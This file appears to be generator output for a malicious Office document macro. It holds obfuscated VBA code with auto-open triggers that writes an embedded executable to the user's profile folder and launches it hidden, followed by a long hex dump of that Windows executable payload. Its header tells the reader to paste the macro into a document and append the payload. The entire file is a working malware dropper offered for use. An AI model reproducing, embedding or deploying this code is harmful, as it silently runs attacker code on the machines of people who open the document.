'**************************************************************
'*
'* This code is now split into two pieces:
'*  1. The Macro. This must be copied into the Office document
'*     macro editor. This macro will run on startup.
'*
'*  2. The Data. The hex dump at the end of this output must be
'*     appended to the end of the document contents.
'*
'**************************************************************
'*
'* MACRO CODE
'*
'**************************************************************

Sub Auto_Open()
	Vlndz12
End Sub

Sub Vlndz12()
	Dim Vlndz7 As Integer
	Dim Vlndz1 As String
	Dim Vlndz2 As String
	Dim Vlndz3 As Integer
	Dim Vlndz4 As Paragraph
	Dim Vlndz8 As Integer
	Dim Vlndz9 As Boolean
	Dim Vlndz5 As Integer
	Dim Vlndz11 As String
	Dim Vlndz6 As Byte
	Dim Tshpzdwroa as String
	Tshpzdwroa = "Tshpzdwroa"
	Vlndz1 = "PRXftDiYuxSNz.exe"
	Vlndz2 = Environ("USERPROFILE")
	ChDrive (Vlndz2)
	ChDir (Vlndz2)
	Vlndz3 = FreeFile()
	Open Vlndz1 For Binary As Vlndz3
	For Each Vlndz4 in ActiveDocument.Paragraphs
		DoEvents
			Vlndz11 = Vlndz4.Range.Text
		If (Vlndz9 = True) Then
			Vlndz8 = 1
			While (Vlndz8 < Len(Vlndz11))
				Vlndz6 = Mid(Vlndz11,Vlndz8,4)
				Put #Vlndz3, , Vlndz6
				Vlndz8 = Vlndz8 + 4
			Wend
		ElseIf (InStr(1,Vlndz11,Tshpzdwroa) > 0 And Len(Vlndz11) > 0) Then
			Vlndz9 = True
		End If
	Next
	Close #Vlndz3
	Vlndz13(Vlndz1)
End Sub

Sub Vlndz13(Vlndz10 As String)
	Dim Vlndz7 As Integer
	Dim Vlndz2 As String
	Vlndz2 = Environ("USERPROFILE")
	ChDrive (Vlndz2)
	ChDir (Vlndz2)
	Vlndz7 = Shell(Vlndz10, vbHide)
End Sub

Sub AutoOpen()
	Auto_Open
End Sub

Sub Workbook_Open()
	Auto_Open
End Sub

'**************************************************************
'*
'* PAYLOAD DATA
'*
'**************************************************************

Tshpzdwroa
&H4D&H5A&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00&HFF&HFF&H00&H00&HB8&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H80&H00&H00&H00&H0E&H1F&HBA&H0E&H00&HB4&H09&HCD&H21&HB8&H01&H4C&HCD&H21&H54&H68&H69&H73&H20&H70&H72&H6F&H67&H72&H61&H6D&H20&H63&H61&H6E&H6E&H6F&H74&H20&H62&H65&H20&H72&H75&H6E&H20&H69&H6E&H20&H44&H4F&H53&H20&H6D&H6F&H64&H65&H2E&H0D&H0D&H0A&H24&H00&H00&H00&H00&H00&H00&H00&H50&H45&H00&H00&H4C&H01&H03&H00&H6D&H39&HC2&H7A&H00&H00&H00&H00&H00&H00&H00&H00&HE0&H00&H0F&H03&H0B&H01&H02&H38&H00&H02&H00&H00&H00&H0E&H00&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H10&H00&H00&H00&H20&H00&H00&H00&H00&H40&H00&H00&H10&H00&H00&H00&H02&H00&H00&H04&H00&H00&H00&H01&H00&H00&H00&H04&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H02&H00&H00&H46&H3A&H00&H00&H02&H00&H00&H00&H00&H00&H20&H00&H00&H10&H00&H00&H00&H00&H10&H00&H00&H10&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H30&H00&H00&H64&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H2E&H74&H65&H78&H74&H00&H00&H00&H28&H00&H00&H00&H00&H10&H00&H00&H00&H02&H00&H00&H00&H02&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H20&H00&H30&H60&H2E&H64&H61&H74&H61&H00&H00&H00&H90&H0A&H00&H00&H00&H20&H00&H00&H00&H0C&H00&H00&H00&H04&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H20&H00&H30&HE0&H2E&H69&H64&H61&H74&H61&H00&H00&H64&H00&H00&H00&H00&H30&H00&H00&H00&H02&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H30&HC0&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HB8&H00&H20&H40&H00&HFF&HE0&H90&HFF&H25&H38&H30&H40&H00&H90&H90&H00&H00&H00&H00&H00&H00&H00&H00&HFF&HFF&HFF&HFF&H00&H00&H00&H00&HFF&HFF&HFF&HFF&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HB8&H13&H39&H83&HC3&HDB&HC1&HD9&H74&H24&HF4&H5D&H33&HC9&H66&HB9&H04&H02&H83&HC5&H04&H31&H45&H11&H03&H45&H02&HDB&H76&HF2&HE4&H73&H71&HE5&HA4&H83&HE5&HFA&H14&HE0&H6C&H24&HEF&H32&HF7&HAB&H98&H1A&HCA&H6D&HD2&HB8&H3F&HD0&H29&H08&H0E&HB2&H7C&HD7&H65&HC6&HBB&HE3&H86&H95&H53&HD4&HE4&H57&H2C&H17&H7A&H1C&H52&H7C&H9D&H4D&HE3&HFA&HE0&H6B&HE3&HB0&HEF&H22&HEB&H6C&H4B&H60&HF5&HFF&H7D&HD3&H18&H10&HAF&H20&H63&HCF&H5D&H86&HD6&H91&H2E&H8D&H42&HCD&H9F&HB6&H9D&HAF&H17&H04&HE4&HFE&H72&HFA&H08&H3C&H26&H6A&H67&H1F&H8C&HE3&H3F&HFE&H17&HFE&H40&HD5&HCF&H03&H11&HAB&H5B&H5D&H02&H05&H7F&HEC&HAD&H2B&HF1&H56&H48&H68&HBA&H5F&HFD&HA7&HA2&HDC&H30&H59&H0D&H1E&HC2&H8B&HB1&H30&HD0&H07&HE9&H81&H94&H1F&HAE&H6F&H07&H03&H71&H38&H31&H3E&HF3&H03&HBD&HD8&HC0&H9C&HEA&H49&H18&H27&H07&HBB&H3A&HFC&HD7&HF9&H9A&HD2&HE0&H7A&HF2&H71&HDD&H83&HB3&H07&H9C&H92&HAF&H30&HDC&HD4&H37&H36&HC6&HDC&H2C&H98&H51&H12&H41&HF8&H58&HB7&H99&H15&HD4&H44&HB1&H3C&HDD&HEA&HC5&HA2&H9C&H05&H44&HE5&H8B&HAE&H32&HAE&HFA&H8C&HCB&H94&H96&H22&HEA&H96&H58&H21&H5A&HBA&H9B&H4C&HD2&H70&H09&H09&H61&HD2&H18&HE9&HF4&H1C&H1F&HEB&H6D&H02&HF2&H9C&HFD&H8D&H92&H47&H2A&H3D&HE4&HED&HB6&H86&H7C&H04&H0A&HF0&HDA&HDB&HE0&H93&H6A&H8C&H3C&H98&H9A&H3D&H20&H35&HA7&H92&H86&HA7&H21&H2F&H23&H9B&HB3&H02&H5B&H0F&H53&H10&HB4&H8A&HEE&HE7&H8E&HF4&HF7&HED&HBC&HDE&H89&H7D&HBC&HCC&H20&H91&HC4&HDF&HE2&HB4&H48&H3A&H4C&H23&H45&H59&H9E&HC9&H77&HAB&HFA&H74&H0E&H35&H1E&H41&HBD&H5B&H96&H86&HA9&HDB&H95&HC5&HF5&H37&H82&H56&H3E&H53&HF0&HC5&H2F&H7C&HFB&H57&H43&H8A&H57&H5D&H92&H82&HEB&H68&HCE&H1D&HEF&H0E&H62&HB8&H9C&H8D&HF9&HA9&H5E&HDB&H08&HD1&HD0&HB7&HF2&H3B&HE2&H72&HFC&HE5&H71&HBA&H70&HB5&HA9&H64&HF6&H70&HF9&H42&H7B&H47&H97&H87&H2E&HB4&H63&HF0&HB5&HFF&H7C&HEF&HFE&HEA&H3F&HE0&HA0&H06&HA8&H55&H7F&H29&HF0&HE2&H9C&HA0&H4D&H04&H97&H38&H63&HE6&H18&HF3&H44&HDE&HF5&H25&H2E&H2A&H7B&H4A&HBD&H46&HED&H59&H9C&H6E&H66&HDF&H6B&H23&H99&HBA&H1A&H35&H39&H12&H9A&H6B&H9F&HDA&H74&HCA&HC9&H85&H5C&HC8&HB2&H39&H41&HA6&H17&HC5&H12&H12&H32&H3C&H80&H10&H52&HAF&H4F&H4D&HAC&HB5&H82&H66&HA9&H76&HF5&HD8&HB6&H97&HEE&H43&H6E&HB7&HC0&H28&H05&H42&H23&HAD&HCD&H20&H3B&HE8&H08&H14&H6D&HAD&HA2&H3E&H05&H82&HC8&HFC&HD3&H94&H6F&H4E&H73&HD0&H87&H26&H6D&H2A&H79&H5E&HED&HC7&HF9&H6B&H54&HCC&H56&H52&H2B&H7D&H59&H54&H78&HA1&HFF&HDD&H98&HF0&H35&H55&HEB&H13&H77&H37&HAF&H79&H3D&HFF&H42&H65&HF1&H8F&HC2&H90&HC2&HC6&HFD&H92&H37&H5C&HE4&H85&HE9&H9D&H42&HDF&HFB&H25&H43&H20&H45&HBE&H6E&H51&H0B&H80&HFB&HEE&H3F&H6B&HE5&HF0&H63&HCD&HD0&HC5&H28&HC5&HE4&H04&HAD&H8E&H8B&H32&H07&HDB&H57&H66&HB8&HC8&H24&H28&HE3&HA6&H71&HBB&H87&H28&HDD&H14&H03&HC8&H0F&H70&HD9&HD7&H22&H7F&HAB&HE7&H8D&HFD&HBC&HC2&H2F&HF0&HCD&H5C&HA8&H04&HB6&HF0&HA9&HEA&H4A&H3E&H8E&H71&H10&HD6&HAC&H69&H59&H64&HBE&HFA&H5E&HF5&H0A&HA9&H61&H9E&H65&HD8&HB0&H5A&H57&HDF&H0E&H1B&H9B&HAA&H21&H98&H63&HB2&HA5&H89&HA4&H49&H4C&H3F&HE1&HDE&H13&H00&HC0&HE8&H23&H85&H7C&H7F&H2D&H87&HDB&HCF&H3B&HE6&H05&H93&HFE&H11&H28&HAD&HD6&HEB&H75&H09&HD4&HB5&H85&H9A&H22&H0D&HED&H99&H23&H0B&H39&HB8&HC8&H1D&HC8&HB5&H6B&H3D&H54&HB9&HDB&H68&H28&H7E&H30&H7E&H59&HFE&H8B&H9B&HC9&HDA&HF2&H2D&H71&H24&H71&H94&HE5&H2E&H62&HD2&H17&H61&H9B&HBF&HEB&H83&HA6&HA5&HDC&H85&H99&H80&H5F&HBE&H51&HC0&HF6&H7B&H8E&H42&HF5&H6C&HF5&HD3&HD9&H15&HD8&HD2&H27&H96&H25&H8D&H5F&H9F&HDB&HEE&HEF&H59&H67&H53&HAB&H8A&H77&H29&HBB&H3D&H8F&HB8&H3C&H27&H6C&HC5&H05&H0A&HEB&H97&H70&H9B&H38&HE7&H03&HFC&H06&H46&HAB&HC1&H07&HBC&H21&H46&H36&H2C&H4E&H14&H99&H82&H16&H0C&HD8&HC7&H27&HCD&HB3&HC2&H9A&HB0&HA6&H2F&H38&H8D&HA6&H52&H23&H9F&HC2&H3A&HD9&H1E&H7D&H08&HEC&H7C&H9B&H5A&HE7&H4C&HBB&HA7&HF3&H8C&H71&HAD&HF9&H0E&HC1&H04&HFB&H6E&HAD&HDD&H97&H71&H5C&H51&H0D&H83&HCC&H13&HFE&H7B&H7B&HCF&HA5&H34&HB9&HF0&H01&H53&HBA&H4B&HA5&H8A&H16&H3C&HF1&HA7&H1C&H2B&HAE&HC4&H40&H05&HC8&H76&H38&H3A&H47&H94&H15&H82&HE5&H82&HB7&HF8&HC9&H02&HF0&H88&HF5&H64&H0E&HEE&HC8&HC8&H9B&H3D&HFE&H3F&HE4&H77&HB5&HD1&H7F&H79&HF4&H09&HBD&H6A&H24&H85&H9D&H3D&HC3&HE9&HA9&H12&H8B&H2D&H5C&HE9&H41&H9F&H84&HB3&HC3&H47&HAE&H46&H0A&HEF&HB4&H78&H74&H39&H03&H18&HB6&HA4&H79&H38&H69&HC5&HBB
&HAD&H2D&H7F&H2C&H2C&H19&H16&HC0&HC4&H1D&HFA&H27&H1C&H4A&H75&H62&H3D&H52&HCA&HC1&HEE&HF8&HBD&HEA&HE3&H78&HC4&H63&H36&H74&H21&HEC&HC2&H3B&HF5&HC8&H12&HAB&H90&H1F&HC7&H34&H35&HAF&H37&H71&HEB&H98&HF7&H69&H82&HDF&H1D&H9F&HEE&HD8&H9B&H72&HD7&H68&H13&H28&H0B&H57&HEB&H92&HFE&HC8&HEE&H33&H63&H76&H48&HD1&HEE&H45&HC6&HB8&H4F&H38&HDD&HD8&H29&HC2&H90&HB0&HA3&H2A&HE0&H29&HAA&H7C&H3F&HCE&HCC&H3E&HBB&HD0&HB0&HC5&HC7&H7C&HED&HFE&H54&HDA&H5A&HD6&H78&HD1&HB4&H1B&H71&HC2&H0B&H01&H2A&HAB&HEF&HBF&H0A&HDB&HD4&H27&HFC&H29&HA8&H67&H70&HAE&HE0&HA4&H06&HDD&HBD&HDC&H71&H9B&H8D&HFE&H2D&H2B&HD7&H8B&HCC&H1C&HC3&HF9&H47&H1F&H1D&H74&HD9&H09&H77&HD3&H71&HD7&HE6&HE8&H91&HCF&H85&HD4&H2A&HDF&HEB&H8D&HA4&HBC&H3C&H54&H07&H7F&H2A&H50&H99&H33&H69&H73&H4D&H86&H9E&H51&HB9&H20&H64&H4B&H86&H57&H8F&H23&HF6&HAB&H79&HA7&HEA&H32&HA5&HC6&H88&HC9&HDA&H17&HE4&HD3&HBD&H63&H4C&H2D&H5C&H43&H6D&H1B&H84&H38&H0F&H3E&H62&HDF&HCE&HF3&H3F&HEC&HFE&HE0&H15&H1A&H0C&H9C&HAB&HAB&H6D&HC1&H16&H09&HB6&H6A&H92&H00&H07&H65&H48&HC0&H8D&HB3&HA9&H31&H87&H26&HC3&H91&H64&HEA&HB3&HA3&HA9&H25&HED&HDB&HF3&H8B&H11&HF0&H70&H9C&HF5&HBB&HA0&H66&H65&H0F&HF0&HB5&H89&HAF&HFE&H37&H55&HA8&HD9&H78&H46&H17&H3D&HAB&H12&H03&H4A&H7F&HB8&H95&HDC&HD5&HAD&H21&H88&H10&H36&HC5&H93&H84&HE0&H7E&H62&HC1&HF4&H05&H0B&HD7&H4D&HCD&HDC&H19&HD9&H9C&H18&H99&H88&H18&HF6&H61&H21&H47&H7A&HB4&H45&HB1&H17&H2D&H8F&H90&HB0&H86&H2F&HD8&H2E&HDA&H90&H08&H88&H88&H72&H41&H4B&HD6&H86&H89&H1D&HB2&H98&HAA&H69&H14&HB1&H4A&H58&H15&H52&H94&HFB&HB6&H5A&HC9&H20&H71&H26&HEC&H63&H37&HAA&H69&HAD&HAA&H78&HF6&HD3&HCE&H92&H06&H7C&H30&H42&H7C&H2D&H96&H98&H3D&HAC&H16&H33&H9A&H7D&H5F&HDF&H5D&H28&H42&H32&H64&H9B&H2B&H4B&HA1&HBF&HF8&H11&H3D&HF6&H2E&HD1&H43&H94&H3E&H82&HAA&H3A&HEE&H8C&HA0&H12&H3B&HE2&H86&H28&HD4&HAD&H52&HFD&H5C&H14&H46&H17&HE0&H9E&H5B&H96&H31&HA5&H77&HE5&H73&H1B&H09&H38&H68&H5F&H6B&HA6&H69&H43&HC3&H17&HF7&HA5&H8B&HF4&H4A&HEE&HD6&H15&H27&HF6&H0E&HA5&H7D&H87&H58&HD7&H95&H8D&H93&HE8&HD6&HD0&HD6&HEC&H10&H37&H2F&H11&H4B&H94&H3F&H2E&H4D&HD8&H3A&HC9&HBD&HA5&H19&HFB&H98&H01&H3F&HF2&H22&H6E&H7C&H05&HEF&H3C&H72&H3D&H4F&H53&H65&H6D&H2B&HC7&H6E&H76&H95&H82&HBA&H8D&H3A&H74&H95&HFF&HC1&HF3&H49&HDD&H7D&HFE&HE5&HA0&H2E&HCF&H49&HC3&H90&H8C&H5F&H0C&HB9&H11&H94&H0B&H24&HEC&H4E&H13&H9E&H96&H71&H83&HC0&H77&H91&H00&HA0&HC7&H26&H80&HBA&H35&H73&H74&HCF&H09&HB4&HF9&HD0&HE0&H21&H75&HAB&HA0&H94&H98&H4D&HCE&HA7&H21&H58&H3C&H29&H57&H17&HC8&HFE&HA8&HC3&HD1&H09&H26&HC1&HA2&H3F&H46&H5D&H30&HA7&HFE&H76&H9E&H49&H6A&H8F&H35&H17&H2C&HDC&HAE&HD5&H33&H77&HAB&HA9&H66&HD0&H1D&HDF&HDB&HF7&H36&HD7&HF8&HB7&HDF&HF5&H72&HF5&HB0&H57&H6D&H75&H21&H07&HE7&H22&HDD&H84&HEC&H40&HCA&H8F&HBC&H1A&HB4&H03&HE0&HEE&HBA&H07&H4F&HA7&HF4&HCE&H94&H07&HFB&H7A&H40&HA1&H5C&H50&H6E&H0C&HDB&H1D&H83&H8A&H69&H16&H34&H83&HEB&H96&H71&HF7&H2B&H94&HDF&H33&H85&HB2&H9F&H82&HE8&H72&HBD&H18&HB0&HF9&HF4&H91&H2B&H30&HF5&H5E&H08&H20&H37&H9C&H0F&H8B&HC6&H36&H08&H58&H9B&HF8&H40&H73&H84&H02&H3E&H54&H3A&H24&H68&H29&H12&H23&HE5&HF6&HD3&HF1&H6A&HD2&HCF&H29&HD5&HD9&H8C&HFA&HE4&HA3&H7E&H47&H0E&H6C&HBC&H59&HED&H9F&H3F&HDE&H1E&HB4&H31&HAD&H66&H44&H71&HEC&HC0&H1B&HF5&H70&H8A&H7D&H3A&H9D&H20&H2A&HD1&HB4&H08&H83&HA8&HED&H77&H08&HFB&HC2&HCE&H5C&H57&H9A&H10&HBC&H65&H0E&HF7&H92&HD7&H32&HE3&H38&H18&H4A&HC0&HF3&H3D&H1A&H2B&HBF&HF2&H4D&HB0&HD7&HB0&H95&H8A&H52&H09&H2C&H2D&HA0&HDE&HAC&H8E&HB6&H8A&HEA&H59&HB2&H0D&H7B&HD0&HFA&HD2&H50&HED&HB2&H6A&HA4&H26&H95&H7D&HDC&HB0&HB5&H7F&H00&H68&H20&HD3&H73&HD8&H8B&H2D&H88&H84&H16&HF0&H2C&H6A&H90&H6C&H93&H3A&HDF&H9F&HFE&HCC&H11&H37&HED&H58&H19&HFC&HFB&H81&H70&HEE&HC8&H1B&H87&H67&H1F&H12&HD0&HE2&H84&H88&H6C&H07&H23&HDA&H84&H16&H0C&H99&HB5&HE4&HDE&HFB&H7C&H05&HBC&H16&H57&H23&H48&H62&H6B&HE9&HA4&H69&HA1&HEA&H24&H4E&HA7&H76&H3A&HC1&HF3&H30&HA2&H80&HF2&H8C&H0E&H6F&H61&H06&HAC&HD7&H28&H9F&H98&H9A&HD2&H55&H29&HB2&H33&H23&H9F&H01&HF9&HF9&H79&HD0&H3D&H99&H1C&H7F&H0F&H8A&HCC&H99&H82&HF1&H25&HD4&H2C&HD0&HA4&H3E&HB7&HDD&H75&H35&H1E&HF8&H5B&HD4&H45&HE9&H3B&H32&H1B&H07&H68&H45&H30&H0F&HED&HCD&H9E&H53&H99&H7B&HAA&HE9&HC0&HB4&H0E&HAD&H03&HED&HD9&H56&H5F&HE5&H3F&H70&H81&H3D&HB1&H08&HCE&HEA&H29&HD0&H3F&H0C&H4B&H14&H16&H88&HFE&H56&H57&H81&H39&HCB&H81&H19&HF9&H7E&HD7&H5A&H62&H35&H52&HA4&H79&H39&H79&HC3&HED&HE6&HD0&H3D&H14&H6E&H95&H2B&H2E&H5B&HCB&H62&H9B&H82&HF0&HDB&H62&HF8&HBE&H83&HE7&H63&HB8&HB5&H47&H6A&HB9&H0F&H35&H80&H3F&H7F&HBD&H2E&H3C&HDB&HF2&H59&H56&H8A&HD0&H70&H1D&H91&H27&H44&HF9&HF3&H1A&HB2&H1C&HC2&HB6&HCA&HA3&H41&H3D&HAF&HA5&HF6&HB3&HBD&HDB&H38&H62&HF0&H26&H2F&HAB&HA4&H7D&H80&H7A&H8A&HC4&HFF&H4C&HDC&HFE&H0D&HD4&HB0&H75&H58&H41&H23&HB2&H62&H29&H7C&H9B&HC0&HF3&H6B&H3F&HD8&HC9&H33&H57&H03&H0E&H17&HC0&HC5&H52&H14&H26&HCF&H32&HA2&H0E&HB6&HE8&H6A&HBF&H2B&HA7&H41&H1D&H8B&H85&HAB&H7B&H9A&H8F&H62&H43&HE8&H7B&HBA&HB1&HA1&H73&H3B&HF4&H8B&H70&HC1&H25&H94&HA0&H31&H27&H37&HD5&HC3&H17&HC4&H76&H6D&HF8&HB8&HC5&H00&H03&H21&HEB&H74&H32&H0F&HBE&H07&HD8&HCA&H89&H58&H4A&HDB&HAE&HA7&H43&H94&H00&H84&HBA&H0B&HB5&H39&H36&HD3&H64&HA6&H61&HE4&H1F&HEC&H8C&HD4&H11&H41&HC8&H1E&HEF&H08&HDE&H3E&HDB&HDE&H53&H9A&HDC&HDC&HAE&H8D&H69&H15&H40&H46&HCF&HA7&HD1&H14&HB8&H47&HAB&H12&H31&HAF&H8A&H29&HF8&H59&HE3&HEB&H42&H63&HF0&H4B&H1D&HBE&HED&H55&H65&HED&HFC&HE9&H37&HD8&HCE&H57&H8D&H52&H76&HB8&HBC&H7A&HF6&H69&H14&HB4&H32&H36&H64&HF7&H9A&HCC&H87&H69&H60&H7A&H5E&HCA&HDD&H42&HAB&HC8&HAD&HF0&H83&HF2&H71&HF9&HB4&HAD&HE4&HB5&H48&HBB&HA3&HB4&H82&H2D&HD8&H27&H54&H4C&H85&HD0&HAA&HBA&H87&HA6&H85&HF3&HBD&HAC&H41&H04&HBB&HD4&H02&H94&H61&H38&HFA&HC4&H62&HB5&HDD&H00&H2F&H0D&HFE&H4E&H15&H68&HB2&H9E&H47&H4B&HE8&H30&H17&H88&HBA&H1D&H18&H1B&HFD&HE3&HCF&HD7&H24&H95&HAD&H8A&HCE&HA0&HBF&HF3&H36&H79&H30&H9F&H01&H00&HE7&H6B&H8D&H8C&HCF&HB0&H49&H07&HE9&HE0&H21&H1B&H11&H64&H0D&H5C&H23&HA3&H61&H8F&H7B&HCD&HA5&H05&H86&HBD&H09&H8C&H98&HE3&HC0&HF5&H83&H38&HB0&H21&H0F&HBF&H63&H6A&H70&H69&H5C&H0D&H7A&HD2&HD2&HC9&H66&HC1&H38&H77&HB6&H3D&HF0&HD5&H3E&H4D&H78&HA3&HEC&H9C&HA2&H95&H8E&HDE&HF3&HF7&HB0&H6E&H15&HD3&H0B&H19&H30&H95&H2F&H18&H02&H27&HD7&H88&HD2&HD1&HE8&H02&H13&H72&H6B&HB9&H16&HC4&H44&H8F&H11&HFB&HF6&HA2&HD4&H4A&HAE&HCF&H28&H35&HF3&H81&H30&H07&H12&HA5&H18&HED&HAF&H93&HED&H5E&HA5&H3D&H92&HBC&HE9&HDB&HE9&HE8&H0F&HE7&H02&H26&H87&H4B&HAE&HC4&H8B&HC6&H3C&HB1&HD1&H6D&H5E&H45&H98&HAF&H4C&HF3&H8C&HB6&H50&H02&H4B&HEE&H03&H54&HD4&H66&H12&H5C&H46&HA9&H86&H12&H93&H88&H14&HE8&HE5&H0D&HC4&H46&HC0&H1C&H2D&H17&H9A&H2D&HD7&H02&H90&HDC&H76&H7E&H12&H34&H1A&H13&HF5&HB0&H4C&H08&H24&H7A&H65&H03&H5C&HA5&H45&H87&HAC&H13&H54&H3E&HB3&H22&H41&HC9&H36&HB0&H48&H3F&H39&HBF&H23&HF4&H4E&H23&H47&H21&H3C&HC2&H93&H84&H3D&H60&HDD&HFA&H56&HAD&HE3&H06&H02&HC7&H97&H28&HA5&H3E&HB0&H72&H83&HCC&H43&HB4&HDA&H02&HB0&H96&H13&H6F&H0E&HAA&H21&H2F&HF5&H3B&H60&HD9&H8A&HFB&H3A&HEA&H18&H92&HBE&H9F&HCE&H73&H4E&H55&H3E&HC1&H13&H95&HF5&H22&H2D&HDC&H02&H77&H58&H48&HB9&H13&H64&HB4&HA0&HEC&H97&H1B&H2B&H0C&H77&H29&HE8&H89&H0E&H53&H4A&HCF&H4A&HB5&HF4&HF1&HBC&H57&HD4&H4F&H66&H88&H5D&H82&H5F&H05&H47&H7F&HF3&H59&HF8&H86&H5A&H7C&H18&H1B&HF6&HEE&HF2&HC8&HBC&H63&H9C&HAA&H4E&H2F&HDD&H0D&HF6&HA2&H39&H75&H40&H06&H05&H8B&H6C&H2B&H1C&H23&HDA&H86&HB9&HE3&H2C&H7A&H05&H7A&H0A&H71&HA8&H80&HFE&H2C&HE4&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00
